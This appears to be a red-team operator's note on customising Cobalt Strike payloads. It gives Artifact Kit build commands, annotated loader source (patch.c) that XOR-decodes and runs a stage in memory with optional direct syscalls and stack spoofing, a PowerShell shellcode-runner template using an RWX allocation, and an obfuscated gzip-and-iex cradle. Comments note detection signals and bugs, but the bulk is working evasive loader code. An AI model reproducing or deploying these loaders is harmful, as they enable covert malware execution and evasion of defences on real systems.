payload_files
Modifying payloads: compile the Artifact Kit (from WSL on the attacker's Windows machine)
- patch patch.c (source below)
cd /mnt/c/Tools/cobaltstrike/arsenal-kit/kits/artifact
./build.sh mailslot VirtualAlloc 351363 0 false false none /mnt/c/Tools/cobaltstrike/custom-artifacts
cd /mnt/c/Tools/cobaltstrike/arsenal-kit/kits/resource
./build.sh /mnt/c/Tools/cobaltstrike/custom-resources
- after running all of the above, patch the template and compress it (see template.x64.ps1 and compress.ps1 below)
patch.c
C:\Tools\cobaltstrike\arsenal-kit\kits\artifact\src-common\patch.c
/*
* Artifact Kit - A means to disguise and inject our payloads... *pHEAR*
* (c) 2012-2024 Fortra, LLC and its group of companies. All trademarks and registered trademarks are the property of their respective owners.
*
*/
#include <windows.h>
#include <stdio.h>
#include "patch.h"
#if USE_SYSCALLS == 1
#include "syscalls.h"
#include "utils.h"
#endif
char data[sizeof(phear)] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
/*
 * Patch the decoded stage with the addresses of GetModuleHandleA and
 * GetProcAddress so the stage can resolve further imports itself.
 *
 * buffer  decoded stage. Both callers (the two spawn() variants) call this
 *         while the memory is still writable.
 *
 * The offsets come from the `phear` header that `data` is cast to (layout in
 * patch.h, not shown here). A header whose gmh_offset or gpa_offset is <= 0
 * means the stage does not use this convention, and nothing is written.
 */
void set_key_pointers(void * buffer) {
    phear * payload = (phear *)data;

    /* Stage does not follow the GetModuleHandleA / GetProcAddress
       pointer-passing protocol: leave it alone. */
    if (payload->gmh_offset <= 0 || payload->gpa_offset <= 0)
        return;

    void * gpa_addr = (void *)GetProcAddress;
    void * gmh_addr = (void *)GetModuleHandleA;

    /* NOTE(review): neither offset is checked against the stage length, so a
       malformed header writes past `buffer`; this relies on the build tooling
       emitting consistent offsets. `void * + int` is a GNU extension (MinGW
       accepts it) — portable code would cast to char* first. */
    memcpy(buffer + payload->gmh_offset, &gmh_addr, sizeof(void *));
    memcpy(buffer + payload->gpa_offset, &gpa_addr, sizeof(void *));
}
#ifdef _MIGRATE_
#include "start_thread.c"
#include "injector.c"
/*
 * _MIGRATE_ build: decode the stage and hand it to inject() (injector.c,
 * included above, not shown) together with the target process name.
 *
 * buffer  XOR-encoded stage; decoded IN PLACE below
 * length  stage length in bytes
 * key     XOR key, indexed as key[x % 8] — at least 8 bytes are assumed
 *
 * `process` is a 64-byte placeholder (all 'M') which, per the original
 * comment, carries the encoded target process name as: valid name, NUL,
 * junk up to 64 bytes. Presumably the build step replaces the placeholder
 * — confirm against the build tooling.
 */
void spawn(void * buffer, int length, char * key) {
    char process[64] = "MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM";
    int x;

    /* Decode the process name with the key (valid name, \0, junk to fill 64).
       NOTE(review): the loop's `int x` shadows the `x` declared above, and
       sizeof(process) is unsigned while x is signed — harmless here, but
       clang-tidy flags both. */
    for (int x = 0; x < sizeof(process); x++) {
        *((char *)process + x) = *((char *)process + x) ^ key[x % 8]; /* 8-byte repeating XOR */
    }

    /* Decode the stage in place with the same 8-byte key, last byte first. */
    x = length;
    while(x--) {
        *((char *)buffer + x) = *((char *)buffer + x) ^ key[x % 8];
    }

    /* Propagate our key function pointers to our payload. */
    set_key_pointers(buffer);

    /* NOTE(review): the decoded stage stays in this process's memory for as
       long as inject() runs; nothing here clears it afterwards. What inject()
       does with it is defined in injector.c, not visible here. */
    inject(buffer, length, process);
}
#else
#if STACK_SPOOF == 1
#include "spoof.c"
#endif
/*
 * Thread entry: jump to the decoded stage.
 *
 * buffer  start of the executable stage; treated as a function taking no
 *         arguments and returning nothing.
 *
 * With STACK_SPOOF == 1 the current thread id is stored in beacon_threadid
 * (declared in spoof.c, not shown) before the call.
 *
 * NOTE(review): spawn() passes this function to CreateThread /
 * NtCreateThreadEx through a cast although the signature is not
 * `DWORD WINAPI (LPVOID)`. On x64 there is a single calling convention so
 * the parameter arrives correctly; the thread's exit code is whatever the
 * stage leaves behind, i.e. unspecified.
 */
void run(void * buffer) {
    void (*function)();
    function = (void (*)())buffer;
#if STACK_SPOOF == 1
    beacon_threadid = GetCurrentThreadId();
#endif
    function();
}
/*
 * Non-migrate build: allocate memory in THIS process, decode the stage into
 * it, fix the protection, and start it on a new thread via run().
 *
 * buffer  XOR-encoded stage (left untouched; decoding writes to the new allocation)
 * length  stage length in bytes
 * key     XOR key, indexed as key[x % 8] — at least 8 bytes are assumed
 *
 * The allocation strategy is chosen at build time by one of USE_HeapAlloc /
 * USE_VirtualAlloc / USE_MapViewOfFile; USE_SYSCALLS == 1 swaps the Win32
 * calls for the direct-syscall wrappers from syscalls.h / utils.h.
 *
 * The memory is not freed here. Per the original comment it is released by
 * beacon when (1) stage.cleanup is set to true and (2) the reflective loader
 * passes the address of the loader into DllMain — true for the built-in
 * Cobalt Strike reflective loader and the Arsenal Kit's example UDRL.
 *
 * NOTE(review): the observable sequence in the VirtualAlloc / MapViewOfFile
 * paths is allocate RW (or an RWX view) -> write stage -> flip to
 * PAGE_EXECUTE_READ -> create a thread whose start routine jumps into that
 * private, non-image region. That chain is what memory scanners and EDR
 * telemetry commonly key on. No return value is checked anywhere in this
 * function, so an allocation failure becomes a write through NULL.
 */
void spawn(void * buffer, int length, char * key) {
    void * ptr = NULL;
#if USE_HeapAlloc
    /* Private executable heap (HEAP_CREATE_ENABLE_EXECUTE); the handle is never
       destroyed because the stage lives in it. */
    HANDLE heap;
    heap = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);
    /* Allocate a tiny block, then grow it to the stage size with HeapReAlloc.
       NOTE(review): ptr is not checked for NULL after either call. */
    ptr = HeapAlloc(heap, 0, 10);
    if (length > 0) {
        ptr = HeapReAlloc(heap, 0, ptr, length);
    }
#elif USE_VirtualAlloc
#if USE_SYSCALLS == 1
    /* `size` is also consumed by NtProtectVirtualMemory below. */
    SIZE_T size = length;
    NtAllocateVirtualMemory(GetCurrentProcess(), &ptr, 0, &size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
#else
    ptr = VirtualAlloc(0, length, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
#endif
#elif USE_MapViewOfFile
#if USE_SYSCALLS == 1
    SIZE_T size = length;
    /* create_file_mapping / map_view_of_file are the syscall wrappers (not shown). */
    HANDLE hFile = create_file_mapping(0, length);
    ptr = map_view_of_file(hFile);
    NtClose(hFile);
#else
    /* Pagefile-backed section created PAGE_EXECUTE_READWRITE and mapped with
       execute access, so the view starts out RWX. */
    HANDLE hFile = CreateFileMappingA(INVALID_HANDLE_VALUE, NULL, PAGE_EXECUTE_READWRITE, 0, length, NULL);
    ptr = MapViewOfFile(hFile, FILE_MAP_ALL_ACCESS | FILE_MAP_EXECUTE, 0, 0, 0);
    CloseHandle(hFile);
#endif
#endif

    /* Decode from `buffer` into `ptr`, last byte first, with the 8-byte repeating key. */
    int x = length;
    while(x--) {
        *((char *)ptr + x) = *((char *)buffer + x) ^ key[x % 8];
    }

#if STACK_SPOOF == 1
    /* setup stack spoofing (spoof.c, not shown) */
    set_stack_spoof_code();
#endif

    /* propagate our key function pointers to our payload */
    set_key_pointers(ptr);

#if defined(USE_VirtualAlloc) || defined(USE_MapViewOfFile)
    /* Drop write access: RW (or RWX view) -> RX over the whole stage.
       NOTE(review): this guard tests defined(...) whereas the allocation chain
       above tests the macro's value. If build.sh defines the unselected macros
       as 0, the two conditions diverge (VirtualProtect would also run on the
       heap path) — confirm how the macros are passed. */
    DWORD old;
#if USE_SYSCALLS == 1
    NtProtectVirtualMemory(GetCurrentProcess(), &ptr, &size, PAGE_EXECUTE_READ, &old);
#else
    VirtualProtect(ptr, length, PAGE_EXECUTE_READ, &old);
#endif
#endif

    /* Start the stage on its own thread via run(); the thread handle is never
       closed in either branch. */
#if USE_SYSCALLS == 1
    HANDLE thandle;
    NtCreateThreadEx(&thandle, THREAD_ALL_ACCESS, NULL, GetCurrentProcess(), &run, ptr, 0, 0, 0, 0, NULL);
#else
    CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)&run, ptr, 0, NULL);
#endif
}
#endif
template.x64.ps1
C:\Tools\cobaltstrike\custom-resources\template.x64.ps1
# Fail fast on uninitialised variables and invalid property references.
Set-StrictMode -Version 2
# Base64-decode a UTF-16LE ("Unicode") blob — redacted on this page — and hand the
# resulting text to Invoke-Expression. The odd casing of type and method names is
# cosmetic. The blob's contents are not shown, so what it executes cannot be stated
# here; confirm against the original template.
# NOTE(review): whatever reaches iex is visible to script block logging (event 4104)
# and AMSI at run time regardless of how it was encoded on disk.
[SYstEM.Text.EnCodinG]::uniCOdE.gEtstrINg([sysTeM.coNvert]::FrombAse64StrINg("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"))|iex
# Resolve the address of an export without Add-Type / compiled P/Invoke.
# Finds the GAC copy of System.dll, pulls the internal type
# Microsoft.Win32.UnsafeNativeMethods out of it, and calls its GetModuleHandle and
# GetProcAddress(HandleRef, string) wrappers through reflection.
#   $var_module     module name as loaded in this process (callers pass kernel32.dll)
#   $var_procedure  export name
# Returns the IntPtr returned by GetProcAddress. Nothing checks for a zero module
# handle, so an unloaded module presumably surfaces as a reflection exception or a
# zero pointer rather than a clear error.
function get_proc_address {
    Param ($var_module, $var_procedure)
    $var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
    $var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
    return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}
# Build a delegate type at run time with System.Reflection.Emit so an unmanaged
# function pointer can be called through Marshal::GetDelegateForFunctionPointer.
#   $var_parameters   parameter types of the target function (mandatory)
#   $var_return_type  return type, [Void] by default
# Emits a sealed MulticastDelegate subclass named 'MyDelegateType' in an in-memory
# assembly 'ReflectedDelegate', with runtime-implemented .ctor and Invoke, and
# returns the created Type.
function get_delegate_type {
    Param (
        [Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
        [Parameter(Position = 1)] [Type] $var_return_type = [Void]
    )
    $var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
    $var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
    $var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')
    return $var_type_builder.CreateType()
}
# Only runs in a 64-bit PowerShell process ([IntPtr]::Size -eq 8); a 32-bit host does nothing.
If ([IntPtr]::size -eq 8) {
    # %%DATA%% is a literal placeholder here; presumably the build step substitutes the
    # base64 of the XOR-encoded stage — confirm against the build tooling.
    [Byte[]]$v_code = [System.Convert]::FromBase64String('%%DATA%%')
    # Single-byte XOR with 35 (0x23), decoded in place in the managed array.
    for ($zz = 0; $zz -lt $v_code.Count; $zz++) {
        $v_code[$zz] = $v_code[$zz] -bxor 35
    }
    # VirtualAlloc(NULL, len, 0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE):
    # one RWX private allocation in this process.
    $var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((get_proc_address kernel32.dll VirtualAlloc), (get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
    $var_buffer = $var_va.Invoke([IntPtr]::Zero, $v_code.Length, 0x3000, 0x40)
    # Copy the decoded bytes in with WriteProcessMemory on the current-process
    # pseudo-handle (-1) rather than Marshal.Copy. $ok is never checked.
    $var_wpm = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((get_proc_address kernel32.dll WriteProcessMemory), (get_delegate_type @([IntPtr], [IntPtr], [Byte[]], [UInt32], [IntPtr]) ([Bool])))
    $ok = $var_wpm.Invoke([IntPtr]::New(-1), $var_buffer, $v_code, $v_code.Count, [IntPtr]::Zero)
    # Call the buffer as a void(IntPtr) function; Invoke does not return until the stage does.
    # NOTE(review): RWX allocation + self-targeted WriteProcessMemory + a call into non-image
    # memory from a PowerShell host is a high-signal behavioural chain for EDR telemetry and
    # script block logging.
    $var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (get_delegate_type @([IntPtr]) ([Void])))
    $var_runme.Invoke([IntPtr]::Zero)
}
compress.ps1
C:\Tools\cobaltstrike\custom-resources\compress.ps1
# Obfuscated one-liner. Read without the casing tricks, the backtick escapes inside
# bare words (which the parser resolves to the plain characters) and the two type
# objects stashed in the variables WyizE ([Convert]) and 0eXs
# ([IO.Compression.CompressionMode]), it is equivalent to:
#   $s = New-Object IO.MemoryStream(, [Convert]::FromBase64String("%%DATA%%"))
#   IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Compression.CompressionMode]::Decompress))).ReadToEnd()
# i.e. base64 -> gzip-decompress -> Invoke-Expression of the resulting script text.
# The leading comma wraps the byte[] so it is passed as a single constructor argument.
# NOTE(review): the decompressed script exists as plain text at ReadToEnd() before iex
# runs it, where script block logging and AMSI see it.
SET-itEm VarIABLe:WyizE ([tyPe]('conVE'+'Rt') ) ; seT-variAbLe 0eXs ( [tYpe]('iO.'+'COmp'+'Re'+'S'+'SiON.C'+'oM'+'P'+'ResSIonM'+'oDE')) ; ${s}=nEW-o`Bj`eCt IO.`MemO`Ry`St`REAM(, (VAriABle wYIze -val )::"FR`omB`AsE64s`TriNG"("%%DATA%%"));i`EX (ne`w-`o`BJECT i`o.sTr`EAmRe`ADEr(NEw-`O`BJe`CT IO.CO`mPrESSi`oN.`gzI`pS`Tream(${s}, ( vAriable 0ExS).vALUE::"Dec`om`Press")))."RE`AdT`OEnd"();